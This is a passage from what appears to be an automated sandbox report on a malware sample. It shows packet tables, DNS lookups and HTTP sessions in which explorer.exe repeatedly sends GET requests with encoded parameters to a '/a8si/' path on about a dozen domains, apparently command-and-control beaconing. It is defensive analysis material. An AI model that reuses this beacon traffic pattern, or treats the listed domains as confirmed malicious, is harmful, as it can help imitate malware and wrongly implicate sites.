                                                                        May 12, 2021 12:25:24.748081923 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.748102903 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:24.748121023 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:24.748218060 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:30.060600996 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:30.334333897 CEST8049730202.210.8.86192.168.2.3
                                                                        May 12, 2021 12:25:30.334551096 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:30.334672928 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:30.608279943 CEST8049730202.210.8.86192.168.2.3
                                                                        May 12, 2021 12:25:30.836106062 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:31.151423931 CEST8049730202.210.8.86192.168.2.3
                                                                        May 12, 2021 12:25:32.124258041 CEST8049730202.210.8.86192.168.2.3
                                                                        May 12, 2021 12:25:32.124294996 CEST8049730202.210.8.86192.168.2.3
                                                                        May 12, 2021 12:25:32.124427080 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:32.126872063 CEST4973080192.168.2.3202.210.8.86
                                                                        May 12, 2021 12:25:36.021060944 CEST4973180192.168.2.334.95.69.141
                                                                        May 12, 2021 12:25:36.062160015 CEST804973134.95.69.141192.168.2.3
                                                                        May 12, 2021 12:25:36.062482119 CEST4973180192.168.2.334.95.69.141
                                                                        May 12, 2021 12:25:36.062501907 CEST4973180192.168.2.334.95.69.141
                                                                        May 12, 2021 12:25:36.103591919 CEST804973134.95.69.141192.168.2.3
                                                                        May 12, 2021 12:25:36.103701115 CEST804973134.95.69.141192.168.2.3
                                                                        May 12, 2021 12:25:36.103723049 CEST804973134.95.69.141192.168.2.3
                                                                        May 12, 2021 12:25:36.103907108 CEST4973180192.168.2.334.95.69.141
                                                                        May 12, 2021 12:25:36.104039907 CEST4973180192.168.2.334.95.69.141
                                                                        May 12, 2021 12:25:36.144942999 CEST804973134.95.69.141192.168.2.3
                                                                        May 12, 2021 12:25:46.233526945 CEST4973880192.168.2.381.169.145.162
                                                                        May 12, 2021 12:25:46.276640892 CEST804973881.169.145.162192.168.2.3
                                                                        May 12, 2021 12:25:46.276766062 CEST4973880192.168.2.381.169.145.162
                                                                        May 12, 2021 12:25:46.276973963 CEST4973880192.168.2.381.169.145.162
                                                                        May 12, 2021 12:25:46.319863081 CEST804973881.169.145.162192.168.2.3
                                                                        May 12, 2021 12:25:46.322741985 CEST804973881.169.145.162192.168.2.3
                                                                        May 12, 2021 12:25:46.322768927 CEST804973881.169.145.162192.168.2.3
                                                                        May 12, 2021 12:25:46.322952032 CEST4973880192.168.2.381.169.145.162
                                                                        May 12, 2021 12:25:46.323085070 CEST4973880192.168.2.381.169.145.162
                                                                        May 12, 2021 12:25:46.366920948 CEST804973881.169.145.162192.168.2.3
                                                                        May 12, 2021 12:25:51.537710905 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:25:51.724255085 CEST8049739192.232.222.43192.168.2.3
                                                                        May 12, 2021 12:25:51.724494934 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:25:51.724770069 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:25:51.909885883 CEST8049739192.232.222.43192.168.2.3
                                                                        May 12, 2021 12:25:52.212724924 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:25:52.438540936 CEST8049739192.232.222.43192.168.2.3
                                                                        May 12, 2021 12:25:53.418782949 CEST8049739192.232.222.43192.168.2.3
                                                                        May 12, 2021 12:25:53.418852091 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:25:53.419245958 CEST8049739192.232.222.43192.168.2.3
                                                                        May 12, 2021 12:25:53.419298887 CEST4973980192.168.2.3192.232.222.43
                                                                        May 12, 2021 12:26:02.400471926 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:02.701750040 CEST8049740156.252.96.189192.168.2.3
                                                                        May 12, 2021 12:26:02.701894045 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:02.702056885 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:03.004113913 CEST8049740156.252.96.189192.168.2.3
                                                                        May 12, 2021 12:26:03.197813988 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:03.283816099 CEST8049740156.252.96.189192.168.2.3
                                                                        May 12, 2021 12:26:03.283859015 CEST8049740156.252.96.189192.168.2.3
                                                                        May 12, 2021 12:26:03.284008026 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:03.285224915 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:03.500299931 CEST8049740156.252.96.189192.168.2.3
                                                                        May 12, 2021 12:26:03.500483036 CEST4974080192.168.2.3156.252.96.189
                                                                        May 12, 2021 12:26:08.280189037 CEST4974180192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:08.492702961 CEST8049741184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:08.492861986 CEST4974180192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:08.493067980 CEST4974180192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:08.696099997 CEST8049741184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:08.756416082 CEST8049741184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:08.756465912 CEST8049741184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:08.756701946 CEST4974180192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:08.756794930 CEST4974180192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:08.959125996 CEST8049741184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:13.933931112 CEST4974480192.168.2.364.98.145.30
                                                                        May 12, 2021 12:26:14.072640896 CEST804974464.98.145.30192.168.2.3
                                                                        May 12, 2021 12:26:14.072834015 CEST4974480192.168.2.364.98.145.30
                                                                        May 12, 2021 12:26:14.073214054 CEST4974480192.168.2.364.98.145.30
                                                                        May 12, 2021 12:26:14.211807966 CEST804974464.98.145.30192.168.2.3
                                                                        May 12, 2021 12:26:14.218874931 CEST804974464.98.145.30192.168.2.3
                                                                        May 12, 2021 12:26:14.218928099 CEST804974464.98.145.30192.168.2.3
                                                                        May 12, 2021 12:26:14.219176054 CEST4974480192.168.2.364.98.145.30
                                                                        May 12, 2021 12:26:14.219377995 CEST4974480192.168.2.364.98.145.30
                                                                        May 12, 2021 12:26:30.125844955 CEST4974680192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:30.319618940 CEST8049746184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:30.319713116 CEST4974680192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:30.319866896 CEST4974680192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:30.512630939 CEST8049746184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:30.541549921 CEST8049746184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:30.541579962 CEST8049746184.168.131.241192.168.2.3
                                                                        May 12, 2021 12:26:30.541796923 CEST4974680192.168.2.3184.168.131.241
                                                                        May 12, 2021 12:26:30.541826963 CEST4974680192.168.2.3184.168.131.241

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 12, 2021 12:24:11.490417957 CEST4919953192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:11.539120913 CEST53491998.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:12.578938007 CEST5062053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:12.631120920 CEST53506208.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:14.035444975 CEST6493853192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:14.084173918 CEST53649388.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:15.181551933 CEST6015253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:15.231316090 CEST53601528.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:15.543701887 CEST5754453192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:15.605519056 CEST53575448.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:15.981714010 CEST5598453192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:16.033436060 CEST53559848.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:17.336888075 CEST6418553192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:17.385696888 CEST53641858.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:18.181982040 CEST6511053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:18.230753899 CEST53651108.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:19.137824059 CEST5836153192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:19.189327002 CEST53583618.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:20.389323950 CEST6349253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:20.438283920 CEST53634928.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:21.650604963 CEST6083153192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:21.702214956 CEST53608318.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:22.792871952 CEST6010053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:22.842051983 CEST53601008.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:24.150654078 CEST5319553192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:24.202336073 CEST53531958.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:24.988667965 CEST5014153192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:25.037595987 CEST53501418.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:26.231024981 CEST5302353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:26.281500101 CEST53530238.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:27.036566973 CEST4956353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:27.085688114 CEST53495638.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:30.414036036 CEST5135253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:30.462858915 CEST53513528.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:31.331482887 CEST5934953192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:31.382544994 CEST53593498.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:32.426213026 CEST5708453192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:32.475207090 CEST53570848.8.8.8192.168.2.3
                                                                        May 12, 2021 12:24:44.212776899 CEST5882353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:24:44.275077105 CEST53588238.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:01.522687912 CEST5756853192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:01.571486950 CEST53575688.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:04.099765062 CEST5054053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:04.171396017 CEST53505408.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:24.027081966 CEST5436653192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:24.189014912 CEST53543668.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:27.239752054 CEST5303453192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:27.298490047 CEST53530348.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:29.761121035 CEST5776253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:30.059087992 CEST53577628.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:35.858010054 CEST5543553192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:36.019768000 CEST53554358.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:40.691852093 CEST5071353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:40.749140978 CEST53507138.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:43.211719990 CEST5613253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:43.281693935 CEST53561328.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:46.166529894 CEST5898753192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:46.232381105 CEST53589878.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:51.342669964 CEST5657953192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:51.535154104 CEST53565798.8.8.8192.168.2.3
                                                                        May 12, 2021 12:25:57.237812042 CEST6063353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:25:57.300525904 CEST53606338.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:02.336038113 CEST6129253192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:02.398396015 CEST53612928.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:08.219162941 CEST6361953192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:08.278670073 CEST53636198.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:11.962909937 CEST6493853192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:12.037271976 CEST53649388.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:13.767909050 CEST6194653192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:13.805685997 CEST6491053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:13.867902040 CEST53649108.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:13.931727886 CEST53619468.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:19.256853104 CEST5212353192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:19.358293056 CEST53521238.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:24.372886896 CEST5613053192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:24.451124907 CEST53561308.8.8.8192.168.2.3
                                                                        May 12, 2021 12:26:30.060688972 CEST5633853192.168.2.38.8.8.8
                                                                        May 12, 2021 12:26:30.125046015 CEST53563388.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        May 12, 2021 12:25:24.027081966 CEST192.168.2.38.8.8.80xa172Standard query (0)www.skynetaccess.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:29.761121035 CEST192.168.2.38.8.8.80x4a6eStandard query (0)www.thepocket-onlinelesson.xyzA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:35.858010054 CEST192.168.2.38.8.8.80x66a3Standard query (0)www.shirleyeluiz.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:46.166529894 CEST192.168.2.38.8.8.80x2fa3Standard query (0)www.drisu-goalkeeping.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:51.342669964 CEST192.168.2.38.8.8.80x1f0bStandard query (0)www.rogegalmish.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:57.237812042 CEST192.168.2.38.8.8.80x7055Standard query (0)www.webdomoupravitel.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:02.336038113 CEST192.168.2.38.8.8.80x6182Standard query (0)www.best-cleaner.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:08.219162941 CEST192.168.2.38.8.8.80xb6c6Standard query (0)www.4520oceanviewavenue.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:13.767909050 CEST192.168.2.38.8.8.80x609bStandard query (0)www.omfgphil.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:19.256853104 CEST192.168.2.38.8.8.80x3a0cStandard query (0)www.tracisolomon.xyzA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:24.372886896 CEST192.168.2.38.8.8.80x2e78Standard query (0)www.home-inland.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:30.060688972 CEST192.168.2.38.8.8.80xdff9Standard query (0)www.boostcoachingonline.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        May 12, 2021 12:25:24.189014912 CEST8.8.8.8192.168.2.30xa172No error (0)www.skynetaccess.com52.128.23.153A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:30.059087992 CEST8.8.8.8192.168.2.30x4a6eNo error (0)www.thepocket-onlinelesson.xyz202.210.8.86A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:36.019768000 CEST8.8.8.8192.168.2.30x66a3No error (0)www.shirleyeluiz.com34.95.69.141A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:46.232381105 CEST8.8.8.8192.168.2.30x2fa3No error (0)www.drisu-goalkeeping.comdrisu-goalkeeping.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 12:25:46.232381105 CEST8.8.8.8192.168.2.30x2fa3No error (0)drisu-goalkeeping.com81.169.145.162A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:51.535154104 CEST8.8.8.8192.168.2.30x1f0bNo error (0)www.rogegalmish.comrogegalmish.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 12:25:51.535154104 CEST8.8.8.8192.168.2.30x1f0bNo error (0)rogegalmish.com192.232.222.43A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:25:57.300525904 CEST8.8.8.8192.168.2.30x7055Name error (3)www.webdomoupravitel.comnonenoneA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:02.398396015 CEST8.8.8.8192.168.2.30x6182No error (0)www.best-cleaner.com156.252.96.189A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:08.278670073 CEST8.8.8.8192.168.2.30xb6c6No error (0)www.4520oceanviewavenue.com4520oceanviewavenue.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 12:26:08.278670073 CEST8.8.8.8192.168.2.30xb6c6No error (0)4520oceanviewavenue.com184.168.131.241A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:13.931727886 CEST8.8.8.8192.168.2.30x609bNo error (0)www.omfgphil.com64.98.145.30A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:19.358293056 CEST8.8.8.8192.168.2.30x3a0cServer failure (2)www.tracisolomon.xyznonenoneA (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:24.451124907 CEST8.8.8.8192.168.2.30x2e78No error (0)www.home-inland.comhome-inland.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 12:26:24.451124907 CEST8.8.8.8192.168.2.30x2e78No error (0)home-inland.com81.88.52.88A (IP address)IN (0x0001)
                                                                        May 12, 2021 12:26:30.125046015 CEST8.8.8.8192.168.2.30xdff9No error (0)www.boostcoachingonline.comboostcoachingonline.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 12:26:30.125046015 CEST8.8.8.8192.168.2.30xdff9No error (0)boostcoachingonline.com184.168.131.241A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.skynetaccess.com
                                                                        • www.thepocket-onlinelesson.xyz
                                                                        • www.shirleyeluiz.com
                                                                        • www.drisu-goalkeeping.com
                                                                        • www.rogegalmish.com
                                                                        • www.best-cleaner.com
                                                                        • www.4520oceanviewavenue.com
                                                                        • www.omfgphil.com
                                                                        • www.boostcoachingonline.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.34972852.128.23.15380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:25:24.565185070 CEST1282OUTGET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1
                                                                        Host: www.skynetaccess.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:25:24.747936010 CEST1282INHTTP/1.1 463
                                                                        Server: nginx
                                                                        Date: Wed, 12 May 2021 10:25:24 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 8915
                                                                        Connection: close
                                                                        ETag: "5e52ceb0-22d3"
                                                                        X-DIS-Request-ID: e8467c834b8474c3c6b18d0d2ca7da5e
                                                                        Set-Cookie: dis-remote-addr=84.17.52.78
                                                                        Set-Cookie: dis-timestamp=2021-05-12T03:25:24-07:00
                                                                        Set-Cookie: dis-request-id=e8467c834b8474c3c6b18d0d2ca7da5e
                                                                        X-Frame-Options: sameorigin


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349730202.210.8.8680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:25:30.334672928 CEST1298OUTGET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1
                                                                        Host: www.thepocket-onlinelesson.xyz
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:25:32.124258041 CEST1299INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 12 May 2021 10:25:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34973134.95.69.14180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:25:36.062501907 CEST1300OUTGET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1
                                                                        Host: www.shirleyeluiz.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:25:36.103701115 CEST1303INHTTP/1.1 301 Moved Permanently
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Referrer-Policy: no-referrer
                                                                        Location: https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-
                                                                        Content-Length: 319
                                                                        Date: Wed, 12 May 2021 10:25:36 GMT
                                                                        Connection: close
                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 69 72 6c 65 79 65 6c 75 69 7a 2e 63 6f 6d 2f 61 38 73 69 2f 3f 4e 5a 62 3d 70 4d 34 41 39 79 39 73 32 66 51 4f 54 36 4d 73 65 4c 5a 36 44 31 6e 4a 70 33 5a 6f 58 69 31 44 49 7a 38 48 52 45 4b 73 37 6c 57 4b 6f 32 72 43 66 6b 33 59 42 43 57 6b 31 4c 62 77 58 6a 6b 48 73 65 51 2f 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&amp;2dND=GVTl-">here</A>.</BODY></HTML>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.34973881.169.145.16280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:25:46.276973963 CEST5546OUTGET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1
                                                                        Host: www.drisu-goalkeeping.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:25:46.322741985 CEST5547INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 12 May 2021 10:25:46 GMT
                                                                        Server: Apache/2.4.46 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.349739192.232.222.4380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:25:51.724770069 CEST5548OUTGET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1
                                                                        Host: www.rogegalmish.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:25:53.418782949 CEST5549INHTTP/1.1 301 Moved Permanently
                                                                        Date: Wed, 12 May 2021 10:25:53 GMT
                                                                        Server: nginx/1.19.10
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: https://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-
                                                                        X-Server-Cache: true
                                                                        X-Proxy-Cache: MISS


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.349740156.252.96.18980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:26:02.702056885 CEST5550OUTGET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1
                                                                        Host: www.best-cleaner.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:26:03.283816099 CEST5551INHTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:03 GMT
                                                                        Content-Type: text/html; charset=gbk
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        X-Powered-By: PHP/5.6.40
                                                                        Set-Cookie: ASP.NET_SessionId=umxa4r1wpqvtit5wadtbqazl; path=/; HttpOnly; SameSite=Lax
                                                                        Location: /404.html
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.349741184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
